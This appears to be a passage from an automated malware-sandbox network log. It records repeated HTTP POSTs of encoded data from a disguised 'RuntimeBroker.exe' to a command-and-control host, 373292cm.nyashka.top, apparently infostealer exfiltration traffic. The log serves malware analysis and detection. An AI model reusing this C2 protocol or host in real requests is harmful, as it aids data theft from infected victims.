                                                                                  Data Ascii: 2)+4*%":+1S5<.9[<9)Z#'\,<(.8&:.>_SR:0[Q%?!0'.-%?.1P'Q<<\8A1*,Z+>;;[>:X^[$9-"?2'S*-9"=7&"?<2=?:,0='<-%^-7Y;/_<=<V?9(?!I&8E%6YX<] =24;:,X"<-T>$19:''90![^5]%+(/))
                                                                                  Jan 11, 2025 06:43:41.530436993 CET4944OUTData Raw: 0c 57 05 15 00 00 06 1f 20 33 08 3c 00 5c 04 42 32 2b 05 38 33 00 01 16 35 21 3e 3b 0e 0d 1e 37 22 5c 12 3c 2c 32 3f 06 3f 0d 56 22 34 26 0f 24 3d 15 0d 2a 3c 1d 0f 31 06 03 2c 02 05 5b 08 05 08 01 1c 2f 3c 22 27 3d 27 5e 00 1b 30 01 52 2c 3c 3c
                                                                                  Data Ascii: W 3<\B2+835!>;7"\<,2??V"4&$=*<1,[/<"'='^0R,<<<>00</2_#_1?\;6?![901>;=Y0_*Y31.?%3>)/;=;7>25Y :";<21(U%:\+&""PU+)#1Z,!%+P40>]!]".P>?? \)7$:][.,;V(62;48"_FZW&=3
                                                                                  Jan 11, 2025 06:43:41.530459881 CET4944OUTData Raw: 24 2f 30 1e 37 09 0d 1c 3f 32 39 01 0c 05 29 5a 0a 03 51 13 07 3a 28 00 21 59 3e 59 04 2b 36 00 22 2f 02 5a 27 3a 1a 1e 2b 2a 36 1c 03 2b 59 01 04 32 0f 2b 39 5e 2c 05 3b 5a 0e 56 02 2c 18 17 3d 01 34 04 35 5d 24 5e 3d 3e 25 33 38 31 21 09 26 3b
                                                                                  Data Ascii: $/07?29)ZQ:(!Y>Y+6"/Z':+*6+Y2+9^,;ZV,=45]$^=>%381!&;$]:""<>=>(%'?6Z:4?#H0->&,8-=*]>6%=;3$;/#;?6>H\77:",:'/7,'9-*(G) T@\0&C+4?')/?Z34>4=+#0+#:6*Y:33&R7[[3!='"
                                                                                  Jan 11, 2025 06:43:41.809174061 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:42.451473951 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.65705937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:41.420749903 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:41.770231009 CET2544OUTData Raw: 5f 54 59 57 51 47 54 5f 5b 5f 5a 51 59 56 58 51 57 50 5d 52 57 5d 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYWQGT_[_ZQYVXQWP]RW]SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;;5['4!]=_?=_?;\ P4!(?* %\;>&F$.Y/!
                                                                                  Jan 11, 2025 06:43:42.078850031 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:42.245820999 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.65706037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:42.370186090 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:42.723362923 CET2544OUTData Raw: 5a 55 5c 5f 54 41 54 58 5b 5f 5a 51 59 5f 58 53 57 5a 5d 59 57 59 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\_TATX[_ZQY_XSWZ]YWYS]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;#,5[;" 2)3<?X <#0P?47 =,&F$.Y/
                                                                                  Jan 11, 2025 06:43:43.008708954 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:43.140379906 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.65706137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:43.276381016 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:43.629637957 CET2544OUTData Raw: 5f 57 59 55 54 45 54 5c 5b 5f 5a 51 59 55 58 52 57 59 5d 5d 57 5d 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYUTET\[_ZQYUXRWY]]W]S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./U0!-]71+>0X?.-<>$#Z3 W/+)?X :,>&F$.Y/-
                                                                                  Jan 11, 2025 06:43:43.915575027 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:44.044574022 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.65706337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:44.189635992 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.65706437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:44.277412891 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:44.629692078 CET1872OUTData Raw: 5f 57 5c 5e 54 43 54 5d 5b 5f 5a 51 59 56 58 50 57 5f 5d 52 57 5c 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\^TCT][_ZQYVXPW_]RW\SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\,3!7 *3?-5+.#]#??73<;_7#5;&F$.Y/!
                                                                                  Jan 11, 2025 06:43:44.925116062 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:45.058109999 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 55 3d 1b 2a 5c 31 3b 38 18 25 33 2d 0e 3e 2e 27 5b 29 03 0b 15 27 38 29 5e 27 2e 23 0d 26 3b 00 02 2b 10 29 0a 24 2f 2b 5c 2d 34 2b 5d 0c 13 22 5c 37 14 2d 05 25 12 02 5c 2a 2b 37 5f 20 2f 3a 5b 3f 14 31 50 28 11 23 03 3c 17 3c 01 3c 39 2d 0e 2e 2b 35 15 39 09 39 0c 34 3e 2b 52 0d 11 24 54 28 13 25 54 3e 3e 3f 5c 21 06 3c 03 27 03 22 57 32 0b 3e 1e 30 07 24 1f 25 21 35 51 24 08 3e 09 26 3b 31 01 25 3f 04 0e 23 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &U=*\1;8%3->.'[)'8)^'.#&;+)$/+\-4+]"\7-%\*+7_ /:[?1P(#<<<9-.+5994>+R$T(%T>>?\!<'"W2>0$%!5Q$>&;1%?#"#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.65706537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:44.402563095 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:44.754600048 CET2544OUTData Raw: 5f 56 59 50 54 42 54 5f 5b 5f 5a 51 59 54 58 50 57 5a 5d 5e 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _VYPTBT_[_ZQYTXPWZ]^W_S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/"= 1Y+-#+!([ 7?3V4?()+4V68&F$.Y/)
                                                                                  Jan 11, 2025 06:43:45.037838936 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:45.166389942 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.65706637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:45.290443897 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:45.681310892 CET2544OUTData Raw: 5f 55 59 52 54 40 54 51 5b 5f 5a 51 59 5f 58 53 57 58 5d 5a 57 5e 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _UYRT@TQ[_ZQY_XSWX]ZW^S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./?C"=4] 0*=<^+."<=]4<74!;(97_" 2,.&F$.Y/
                                                                                  Jan 11, 2025 06:43:45.927762032 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:46.064291954 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.65706737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:46.196674109 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:46.551577091 CET2544OUTData Raw: 5f 50 59 52 54 45 54 50 5b 5f 5a 51 59 53 58 51 57 5f 5d 53 57 5e 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _PYRTETP[_ZQYSXQW_]SW^S^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.; !><^40&*-(X<-5]?[?]"<+#13(90"0!]..&F$.Y/5
                                                                                  Jan 11, 2025 06:43:46.844347954 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:46.978204966 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.65706837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:47.113392115 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:47.457885027 CET2544OUTData Raw: 5a 52 5c 52 54 45 51 5d 5b 5f 5a 51 59 55 58 55 57 51 5d 53 57 59 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZR\RTEQ][_ZQYUXUWQ]SWYST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;##" ]705*,Y+-!\(> "<7S41#<74,&F$.Y/-
                                                                                  Jan 11, 2025 06:43:47.741918087 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:47.874331951 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.65706937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:48.068737030 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:48.443443060 CET2544OUTData Raw: 5f 5c 5c 5e 51 42 51 5b 5b 5f 5a 51 59 54 58 51 57 51 5d 5f 57 5f 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\\^QBQ[[_ZQYTXQWQ]_W_ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._;#?@!>743=Y==_+.=^?=/\7/0!1,<9^ 0%\,&F$.Y/)
                                                                                  Jan 11, 2025 06:43:48.681979895 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:48.846643925 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.65707037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:48.985371113 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:49.333055973 CET2536OUTData Raw: 5f 54 59 55 54 46 54 5c 5b 5f 5a 51 59 57 58 52 57 51 5d 5e 57 5e 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYUTFT\[_ZQYWXRWQ]^W^SX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./#/C"\7 2)= _>>\((4<Q723+)#X7#5\;>&F$.Y/1
                                                                                  Jan 11, 2025 06:43:49.617538929 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:49.747021914 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.65707137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:49.889760017 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.65707237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:50.084434986 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:50.442106009 CET1852OUTData Raw: 5f 5c 5c 51 54 44 54 5e 5b 5f 5a 51 59 52 58 50 57 59 5d 53 57 50 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\\QTDT^[_ZQYRXPWY]SWPSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-.0068^ 0Y*-<X?X:?#/0 !8+<70..&F$.Y/1
                                                                                  Jan 11, 2025 06:43:50.712759972 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:50.842292070 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0f 2a 1b 32 12 26 5d 38 54 25 23 2e 54 3d 5b 3b 58 3d 3e 39 5e 24 3b 3a 07 26 3d 38 57 30 05 29 5b 28 2e 08 1b 32 59 33 1e 2c 34 2b 5d 0c 13 22 5c 37 04 31 03 32 3c 06 5b 29 01 37 5d 36 5a 39 03 3c 2a 26 0b 3c 01 30 5f 2b 29 2b 59 2b 3a 25 0f 2e 28 29 16 2d 23 2a 50 34 04 2b 52 0d 11 27 0d 3c 04 31 54 3d 3d 3f 1a 36 06 2c 03 30 3d 00 51 31 21 26 1e 30 17 23 02 25 0b 3d 12 27 08 3d 12 25 02 22 1c 27 2c 35 50 21 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %*2&]8T%#.T=[;X=>9^$;:&=8W0)[(.2Y3,4+]"\712<[)7]6Z9<*&<0_+)+Y+:%.()-#*P4+R'<1T==?6,0=Q1!&0#%='=%"',5P!2#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.65707337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:50.215289116 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:50.567225933 CET2544OUTData Raw: 5f 50 5c 50 51 42 54 5c 5b 5f 5a 51 59 5e 58 57 57 5d 5d 59 57 58 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
